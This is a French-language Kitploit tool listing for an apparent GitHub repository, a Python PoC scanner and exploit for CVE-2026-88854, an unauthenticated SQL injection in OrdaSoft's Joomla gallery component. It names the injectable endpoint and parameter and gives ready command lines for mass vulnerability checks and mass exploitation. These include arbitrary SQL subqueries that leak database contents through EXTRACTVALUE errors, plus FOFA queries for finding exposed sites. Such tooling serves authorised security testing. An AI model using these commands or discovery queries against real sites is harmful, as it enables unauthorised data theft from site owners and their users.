Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-88854 — Scanner PoC et exploit en Python 3 pour CVE-2026-88854, une injection SQL non authentifiée dans OrdaSoft Joomla Gallery, avec vérification de masse et modes de lecture de données EXTRACTVALUE. | Kitploit
Outils/GitHubGitHub/murrez/cve-2026-88854
ReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmurrez/cve-2026-88854

CVE-2026-88854

Scanner PoC et exploit en Python 3 pour CVE-2026-88854, une injection SQL non authentifiée dans OrdaSoft Joomla Gallery, avec vérification de masse et modes de lecture de données EXTRACTVALUE.

Voir le dépôt
il y a 3h 5mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-88854 — Injection SQL dans OrdaSoft Joomla Gallery

Scanner/exploit PoC en Python 3 pour CVE-2026-88854 dans OrdaSoft OS Responsive Image Gallery pour Joomla.

Composantcom_osgallery, com_osgallery_light
Affecté1.0.0 – 6.2.6
Corrigé dans6.2.7+
CVSS 4.09.3 (Critique)
AuthAucune (public mod_osgallery_search)
CWECWE-89

Résumé

showSearchResult() / showSearchResultAjax() lisent textsearch / searchText via $input->getVar(), qui n'applique pas d'échappement SQL approprié. La valeur est concaténée dans une clause LIKE. Des visiteurs non authentifiés peuvent utiliser une injection de type UNION pour lire le contenu de la base de données.

Surface de requête typique :

root@kitploit:~
GET /index.php?option=com_osgallery&task=showSearchResultAjax&format=raw&textsearch=...

Les installations héritées peuvent utiliser le nom de tâche searhResult (faute de frappe).

Prérequis

  • Python 3.9+
  • pip install -r requirements.txt

Utilisation

root@kitploit:~
pip install -r requirements.txt

# Fingerprint + strict SQLi probe (error / time / EXTRACTVALUE)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# MySQL error-based read (default subquery: VERSION())
python poc.py -u https://target.example --mode exploit

python poc.py -u https://target.example --mode exploit \
  --subquery "SELECT DATABASE()"

# Mass exploit (writes leaks to exploited.txt, not hits.txt)
python poc.py --list targets.example.txt --mode exploit --threads 5 --quiet \
  --output exploit_results.jsonl --vuln-list exploited.txt

# Re-tier a prior mass check by manifest version (optional)
python audit_scan.py --jsonl cve_2026_88854_results.jsonl

Options CLI

Sortie (mass check)

FichierContenu
cve_2026_88854_results.jsonlJSON par cible
hits.txtURLs candidates (exploitable_candidate)

Valeurs status courantes (check)

Audit post-scan (audit_scan.py)

Après un check en masse, exécutez audit_scan.py pour récupérer à nouveau les manifestes d'administration et répartir les cibles :

La version de la galerie est lue depuis l'élément <version> dans administrator/components/com_osgallery/osgallery.xml, et non depuis l'attribut Joomla extension version=.

Limitations

  • Le mode Exploit utilise EXTRACTVALUE basé sur erreur MySQL ; MariaDB/Postgres, erreurs désactivées ou WAF peuvent ne produire aucune fuite même lorsque la CVE s'applique.
  • Les différences de longueur booléennes seules ne sont pas traitées comme SQLi confirmée (ModSecurity 406 a causé des faux positifs lors des tests).
  • Une version de manifeste ≤ 6.2.6 indique une fenêtre d'exposition, pas une SQLi exploitable garantie sur chaque hôte.
  • Les installations Joomla en sous-répertoire nécessitent l'URL de base correcte (par ex. https://host/site).

FOFA / indices de découverte

root@kitploit:~
app="Joomla" && body="com_osgallery"
body="/images/com_osgallery/"

Arborescence du dépôt

root@kitploit:~
.
├── poc.py
├── audit_scan.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Les listes de cibles locales et les artefacts d'exécution (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) sont dans .gitignore et ne doivent pas être commités.

Références

  • NVD — CVE-2026-88854
  • OrdaSoft Joomla Gallery

Légal

Pour des tests de sécurité autorisés uniquement. Vous êtes responsable du respect des lois applicables et des règles du programme.

Télécharger l’outil
OptionDescription
-u, --urlURL de base d'une cible unique (installations en sous-répertoire : inclure le chemin)
--listFichier de liste de cibles (une URL par ligne)
--modecheck ou exploit
--subquerySQL à l'intérieur de EXTRACTVALUE (mode exploit, par défaut SELECT VERSION())
--threads, -jConcurrence en masse (par défaut 20)
--timeoutDélai HTTP en secondes (par défaut 20)
--proxyURL du proxy HTTP(S)
--outputRésultats JSONL (par défaut cve_2026_88854_results.jsonl)
--vuln-listCheck → hits.txt ; exploit → exploited.txt
--quiet, -qSortie de progression réduite
StatutSignification
sqli_confirmedSQLi basée sur erreur/temps ou fuite EXTRACTVALUE vérifiée
likely_vulnerable_versionVersion du manifeste ≤ 6.2.6 + endpoint de recherche
likely_componentGalerie détectée, version inconnue
boolean_inconclusiveDifférence de longueur de réponse uniquement (souvent un WAF) ; non compté comme confirmé
patched_versionVersion du manifeste > 6.2.6
component_no_search_endpointComposant présent, tâche de recherche non accessible
no_componentcom_osgallery non détecté
FichierContenu
hits_version_lte_626.txtVersion de la galerie dans le manifeste ≤ 6.2.6
hits_component_endpoint.txtGalerie + endpoint, version illisible
hits_patched.txtManifeste > 6.2.6
fofa_stale.txtAucun composant (ligne FOFA obsolète)
cve_2026_88854_audit.jsonlJSONL enrichi